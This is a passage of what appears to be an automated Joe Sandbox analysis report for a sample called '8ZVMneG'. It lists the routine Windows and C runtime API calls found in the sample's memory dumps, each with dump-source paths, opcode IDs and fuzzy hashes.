                                                                                                                                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00EE0B71,?,?,00000008,?,?,00EE700B,00000000), ref: 00EE0E43
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                  • Opcode ID: 64c62baf0cfab19bce6d3eebbfb457ed73aa01995c7c989b9b0d2ea588aaa978
                                                                                                                                                                                                                                                                  • Instruction ID: 99da01a5db7a2686a5ba254b12b2488b4171d3a154a1ba643dd3751113177afb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64c62baf0cfab19bce6d3eebbfb457ed73aa01995c7c989b9b0d2ea588aaa978
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71B16C31210648DFDB19CF29C486BA57BE0FF45368F299658E8DADF2A1C375E981CB40
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00ECB2CE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8e04d2fb04b7ac6a97f566e54de7b3e26342c43b662735b2d4e9d2e890bf5b9d
                                                                                                                                                                                                                                                                  • Instruction ID: 0d52ab1c0cf7ab7af11b1b1df8f7499d5cb6330a32a854142f7a0867e221eb50
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e04d2fb04b7ac6a97f566e54de7b3e26342c43b662735b2d4e9d2e890bf5b9d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4A1BEB1A002458FCB1CCF6AD9827AABBF1FB88314F24912ED501FB260D3359949CF60
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED8700: RtlAllocateHeap.NTDLL(00000008,?,?,?,00ED7620,00000001,00000364,?,00000006,000000FF,?,00ED126E,00EF1540,0000000C), ref: 00ED8741
                                                                                                                                                                                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EDD448
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00EDD53C
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EDD57B
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EDD5AE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Find$CloseFile$AllocateFirstHeapNext
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4087847297-0
                                                                                                                                                                                                                                                                  • Opcode ID: 72c7f9458ca791077bcd231eb5cddbd208e9c1c1d61d7d8aacb10d4535ae7593
                                                                                                                                                                                                                                                                  • Instruction ID: 7098493fc05244b34fa25be677dc979f87b7ed0675afac0195dbec6fb918cfe6
• Opcode Fuzzy Hash: 72c7f9458ca791077bcd231eb5cddbd208e9c1c1d61d7d8aacb10d4535ae7593
• Instruction Fuzzy Hash: 98515771908118AFDB14AF289C84AFEB7B9DF85318F14619FF418B3301EA308E438B61
APIs
  • Part of subcall function 00ED75D3: GetLastError.KERNEL32(?,?,00ED126E,00EF1540,0000000C), ref: 00ED75D7
  • Part of subcall function 00ED75D3: SetLastError.KERNEL32(00000000), ref: 00ED7679
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EDCC03
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: 8e998960e170347be48c0ddf13e1ff5f23c9fc4660c039048e276b6fd332f141
• Instruction ID: 318e81902e2542e44a081080fc803534fbb340c1ff13322b9103a6aa74885269
• Opcode Fuzzy Hash: 8e998960e170347be48c0ddf13e1ff5f23c9fc4660c039048e276b6fd332f141
• Instruction Fuzzy Hash: 9C21D671524207ABDB289B15DD41ABBB3E8EF04744B20207BFE05F6241EB35DD42C750
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: 324384977efa3fe03bc06758107ca0eb534c9d62713c87481bcabb05ab344196
• Instruction ID: 47792c27347aab13bae867ceeeb66f84f2af3cac2c1818757839416ff81eb502
• Opcode Fuzzy Hash: 324384977efa3fe03bc06758107ca0eb534c9d62713c87481bcabb05ab344196
• Instruction Fuzzy Hash: BDC1CF305016469ECB29CF68C584BBAB7B1EF06308F1C6A1FD496B77A2C371A947CB51
APIs
  • Part of subcall function 00ED75D3: GetLastError.KERNEL32(?,?,00ED126E,00EF1540,0000000C), ref: 00ED75D7
  • Part of subcall function 00ED75D3: SetLastError.KERNEL32(00000000), ref: 00ED7679
• EnumSystemLocalesW.KERNEL32(00EDC8FD,00000001,00000000,?,-00000050,?,00EDC6ED,00000000,-00000002,00000000,?,00000055,?), ref: 00EDC8D4
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: 9ac98a42ce49779f78da8eb0d2ec4a812128c5d17fb72612323aa2774b1ce996
• Instruction ID: ca47eece97dd83f3eb15d1d1cba86015d6dba2eebab6768d3ecc86d319a4740f
• Opcode Fuzzy Hash: 9ac98a42ce49779f78da8eb0d2ec4a812128c5d17fb72612323aa2774b1ce996
• Instruction Fuzzy Hash: E411063A6043065FDB1C9F39C8919BAB792FB84398B24442EE94667740E771B943D740
APIs
  • Part of subcall function 00ED75D3: GetLastError.KERNEL32(?,?,00ED126E,00EF1540,0000000C), ref: 00ED75D7
  • Part of subcall function 00ED75D3: SetLastError.KERNEL32(00000000), ref: 00ED7679
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EDCD23
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: a574e9f2d67325912a22463e5c835d140495c0b818b70b15491a42cb959e0786
• Instruction ID: b6f199c5530a897f9820158171b34ffffb579d94d539331edffc4ca2da2e2cc0
• Opcode Fuzzy Hash: a574e9f2d67325912a22463e5c835d140495c0b818b70b15491a42cb959e0786
• Instruction Fuzzy Hash: DF11C672510217ABDB18AB28DC42ABB77E8EF05354B20517BF901F7241EB74ED06C790
APIs
  • Part of subcall function 00ED75D3: GetLastError.KERNEL32(?,?,00ED126E,00EF1540,0000000C), ref: 00ED75D7
  • Part of subcall function 00ED75D3: SetLastError.KERNEL32(00000000), ref: 00ED7679
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00EDCB19,00000000,00000000,?), ref: 00EDCEA8
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
                                                                                                                                                                                                                                                                  • Opcode ID: bcbf63593a999cf8966abd2a0e1421639a23fbd9be925a8724c782eeadbdc0a7
                                                                                                                                                                                                                                                                  • Instruction ID: 8c815091e0a3042c4207f683b765ba40bead47743d308977a6b185fbff568694
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bcbf63593a999cf8966abd2a0e1421639a23fbd9be925a8724c782eeadbdc0a7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D01A772604117AFDB28976488456FE379CDB403D8F25442AAC02F7280EA70EE42C6D4
APIs
  • Part of subcall function 00ED75D3: GetLastError.KERNEL32(?,?,00ED126E,00EF1540,0000000C), ref: 00ED75D7
  • Part of subcall function 00ED75D3: SetLastError.KERNEL32(00000000), ref: 00ED7679
• EnumSystemLocalesW.KERNEL32(00EDCBAF,00000001,?,?,-00000050,?,00EDC6B5,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00EDCB9A
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: c5940c60a0eae67596e287487180d9f30ccb03c898d73e11ccb2c1d5d439afa3
• Instruction ID: 3ea9bd9c035f579095527802b8c79d6a2f723a77dff2fc73346aab45ac843366
• Opcode Fuzzy Hash: c5940c60a0eae67596e287487180d9f30ccb03c898d73e11ccb2c1d5d439afa3
• Instruction Fuzzy Hash: A6F0C8362043055FDB145F35D886A767BD1EB807A8B25542FF9459B740D6B1DC03C650
APIs
  • Part of subcall function 00ED3EA8: EnterCriticalSection.KERNEL32(?,?,00ED7A60,?,00EF1970,00000008,00ED7952,?,?,?), ref: 00ED3EB7
• EnumSystemLocalesW.KERNEL32(00ED8603,00000001,00EF19F0,0000000C,00ED7F68,-00000050), ref: 00ED8648
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
• Opcode ID: dcd62104b88a1a852100f14f5c4b45210dbc1c7bc8c3075f8b98ddf9950d1cd9
• Instruction ID: 4088af35fdf1460caeff33186ea68b9c7444402e0d515ce027a6f9faa3479d42
• Opcode Fuzzy Hash: dcd62104b88a1a852100f14f5c4b45210dbc1c7bc8c3075f8b98ddf9950d1cd9
• Instruction Fuzzy Hash: 38F03772A01204EFD714EF98E902BAA77F0EB84B21F00512AE810AB2E1CB758945CB81
APIs
  • Part of subcall function 00ED75D3: GetLastError.KERNEL32(?,?,00ED126E,00EF1540,0000000C), ref: 00ED75D7
  • Part of subcall function 00ED75D3: SetLastError.KERNEL32(00000000), ref: 00ED7679
• EnumSystemLocalesW.KERNEL32(00EDCCCF,00000001,?,?,?,00EDC70F,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00EDCCBB
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: 1983d1d9410e896fa89ac3be0e154b7f555ffbecfb4bc097307ff1b77fb8d6fe
• Instruction ID: d1a503d78fb9a2e176d5cfd1dbde61903e7995e54a9a12fd7168c09802629c66
• Opcode Fuzzy Hash: 1983d1d9410e896fa89ac3be0e154b7f555ffbecfb4bc097307ff1b77fb8d6fe
• Instruction Fuzzy Hash: B1F0553630020657CB08AF36D84566ABF90EFC1794B1A405AEB0A9B340C6729843C790
APIs
• GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00ED2C04,?,20001004,00000000,00000002,?,?,00ED1B16), ref: 00ED80A0
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 1f418fde0bcffb0ec163c6b2ed5a7c11c72ef185043321b2b507dff462092f4a
• Instruction ID: 4e213eb5ff6234659d41775d869ced2e33ac766cf23d488d3e7fde7a1a85706f
• Opcode Fuzzy Hash: 1f418fde0bcffb0ec163c6b2ed5a7c11c72ef185043321b2b507dff462092f4a
• Instruction Fuzzy Hash: F3E04F31940218BFCF222F61DD09EAE3F66EF84791F044012FD1575261CF328922EAD4
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0000B761), ref: 00ECB645
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
Memory Dump Source
• Source File: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Memory Dump Source
• Source File: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
APIs
• GetCPInfo.KERNEL32(00A30F68,00A30F68,00000000,7FFFFFFF,?,00EE5D8D,00A30F68,00A30F68,00000000,00A30F68,?,?,?,?,00A30F68,00000000), ref: 00EE5E48
• __alloca_probe_16.LIBCMT ref: 00EE5F03
• __alloca_probe_16.LIBCMT ref: 00EE5F92
• __freea.LIBCMT ref: 00EE5FDD
• __freea.LIBCMT ref: 00EE5FE3
• __freea.LIBCMT ref: 00EE6019
• __freea.LIBCMT ref: 00EE601F
• __freea.LIBCMT ref: 00EE602F
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: __freea$__alloca_probe_16$Info
• String ID:
• API String ID: 127012223-0
• Opcode ID: d0d0d31a999950909ae509e94c674a72c8b223919f507c8b4958c338d070abb8
• Instruction ID: 6b2d059046d7d9a8d572cc668fe8663642730e58d01a23e3305402e617ebe20a
• Opcode Fuzzy Hash: d0d0d31a999950909ae509e94c674a72c8b223919f507c8b4958c338d070abb8
• Instruction Fuzzy Hash: BD71F633A0468D9BDF209B968D42FAE7BE59F5535CF28201AE904BB291EB31DD01C750
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00ECBCAC
• __alloca_probe_16.LIBCMT ref: 00ECBCD8
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00ECBD17
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ECBD34
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00ECBD73
• __alloca_probe_16.LIBCMT ref: 00ECBD90
• LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00ECBDD2
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00ECBDF5
Similarity
• API ID: ByteCharMultiStringWide$__alloca_probe_16
• String ID:
• API String ID: 2040435927-0
• Opcode ID: 98b2555ec99e5a2083e92baf5aaf0c8ff8d2277d4e5a42dabe79c9107e522025
• Instruction ID: 3df9d2321f9a4b8d9bbd921b472c6eb4be17a735db705bc3d7b8b6906f353435
• Opcode Fuzzy Hash: 98b2555ec99e5a2083e92baf5aaf0c8ff8d2277d4e5a42dabe79c9107e522025
• Instruction Fuzzy Hash: C951C17290020AAFEF204F51DD46FFB7BA9EF80B44F24402DFA15B6191DB728C128B90
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
• Opcode ID: 8e0f97e4647312b9ceead5f539edeb0fd48669250f67cc87fd716c991951b375
• Instruction ID: 79c67752e7e65f0f33c240ac6a1da9fb479f307a2a72fbd005ccc54760f5ceb0
• Opcode Fuzzy Hash: 8e0f97e4647312b9ceead5f539edeb0fd48669250f67cc87fd716c991951b375
• Instruction Fuzzy Hash: CDB14672A003959FDB118F68CC81BEEBBA5EF55314F1C5176E904BB382D2759A02C7A2
APIs
• _ValidateLocalCookies.LIBCMT ref: 00ECCBD7
• ___except_validate_context_record.LIBVCRUNTIME ref: 00ECCBDF
• _ValidateLocalCookies.LIBCMT ref: 00ECCC68
• __IsNonwritableInCurrentImage.LIBCMT ref: 00ECCC93
• _ValidateLocalCookies.LIBCMT ref: 00ECCCE8
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 01b9751d4fd2f1fc27fef68d9e754a262130e4603ebd2614c5b81025bd7243a3
• Instruction ID: 952864af9ac2fdcca251d0e280a4abc91446d0c9115a44fc0b0b93681b622a3a
• Opcode Fuzzy Hash: 01b9751d4fd2f1fc27fef68d9e754a262130e4603ebd2614c5b81025bd7243a3
• Instruction Fuzzy Hash: E741C330A002189BCB14DF69C981F9EBBE1EF45314F249159E81DBB352D7329A47CB91
APIs
• GetCurrentThreadId.KERNEL32 ref: 00ECBB1B
• AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00EE7328,000000FF,?,00EC892E), ref: 00ECBB3A
• AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00EE7328,000000FF,?,00EC892E), ref: 00ECBB68
